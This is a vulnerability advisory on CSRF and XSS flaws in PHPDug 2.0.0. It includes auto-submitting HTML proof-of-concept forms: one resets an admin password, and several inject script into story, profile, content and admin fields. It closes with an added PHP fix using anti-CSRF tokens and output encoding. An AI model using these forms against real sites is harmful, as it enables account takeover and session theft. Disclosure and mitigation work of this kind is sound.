PHPDug Multiple CSRF/XSS Vulnerabilities - Vulnerability Warning

2011-05-07T00:00:00
ID MYHACK58:62201130369
Type myhack58
Reporter Anonymous
Modified 2011-05-07T00:00:00

Description

Vulnerability description: PHPDug 2.0.0 contains cross-site request forgery (CSRF) and cross-site scripting (XSS) vulnerabilities. Successful exploitation could lead to compromise of the application, theft of cookie-based authentication credentials, and disclosure or modification of sensitive data.

CSRF vulnerability: the "admin/admin_edit.php" script does not properly validate HTTP requests. Test PoC:

<form action="http://www.myhack58.com/adm/admin_edit.php" method="post" name="main">
  <input type="hidden" name="id[1]" value="USERID">
  <input type="hidden" name="username[USERID]" value="Admin">
  <input type="hidden" name="password[USERID]" value="test123">
  <input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>

XSS vulnerability: the issue exists in "add_story.php", "editprofile.php", "admin/content_add.php" and "admin/admin_edit.php". Test PoCs:

<form action="http://www.myhack58.com/add_story.php" method="post" name="main">
  <input type="hidden" name="story_url" value='http://www.baidu.com/"><script>alert(document.cookie)</script>'>
  <input type="hidden" name="Submit" value="Continue">
</form>
<script>
document.main.submit();
</script>

<form action="http://www.myhack58.com/editprofile.php" method="post" name="main">
  <input type="hidden" name="email" value='email@example.com"><script>alert(document.cookie)</script>'>
  <input type="hidden" name="commentst" value="-4">
  <input type="hidden" name="Submit" value="Save Changes">
</form>
<script>
document.main.submit();
</script>

<form action="http://www.myhack58.com/adm/content_add.php" method="post" name="main">
  <input type="hidden" name="id" value="9 9 9">
  <input type="hidden" name="title" value='page"><script>alert(document.cookie)</script>'>
  <input type="hidden" name="content" value="content">
  <input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>

<form action="http://www.myhack58.com/adm/admin_edit.php" method="post" name="main">
  <input type="hidden" name="id[1]" value="1">
  <input type="hidden" name="username[1]" value='admin<script>alert("XSS")</script>'>
  <input type="hidden" name="password[1]" value="">
  <input type="hidden" name="Submit" value="Submit">
</form>
<script>
document.main.submit();
</script>
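
Mitigation sketch for both issue classes, added here as an example; it is not PHPDug code and not part of the original advisory. It shows a per-session anti-CSRF token checked on state-changing POSTs, and HTML encoding of values echoed back into form fields. The helper names (csrf_token, csrf_check, h) and the csrf_token field name are hypothetical.

```php
<?php
// Added example: hypothetical helpers, not PHPDug source code.
declare(strict_types=1);

// Create (once per session) and return the anti-CSRF token.
// In an application, pass $_SESSION after session_start().
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// True only for a POST that carries the session's token (constant-time compare).
// In an application, pass $_SESSION, $_POST and $_SERVER['REQUEST_METHOD'].
function csrf_check(array $session, array $post, string $method): bool
{
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    return $method === 'POST'
        && is_string($expected) && $expected !== ''
        && is_string($supplied)            // rejects csrf_token[]=... arrays
        && hash_equals($expected, $supplied);
}

// Encode a value for HTML text or a quoted attribute value.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed demonstration input modelled on the PoCs above.
$session = [];
$token   = csrf_token($session);

$forged = ['username' => ['1' => 'Admin'], 'Submit' => 'Submit']; // cross-site form: no token
$legit  = $forged + ['csrf_token' => $token];                     // form rendered by the application

var_dump(csrf_check($session, $forged, 'POST')); // forged request is rejected
var_dump(csrf_check($session, $legit, 'POST'));  // request with the session token is accepted

// The story_url value from the XSS PoC, encoded before being echoed into an attribute.
$story_url = 'http://www.baidu.com/"><script>alert(document.cookie)</script>';
echo '<input type="text" name="story_url" value="' . h($story_url) . '">', PHP_EOL;
```

The handler would call csrf_check() before applying any change in admin_edit.php or content_add.php, and every template would pass stored or submitted values through h() before output.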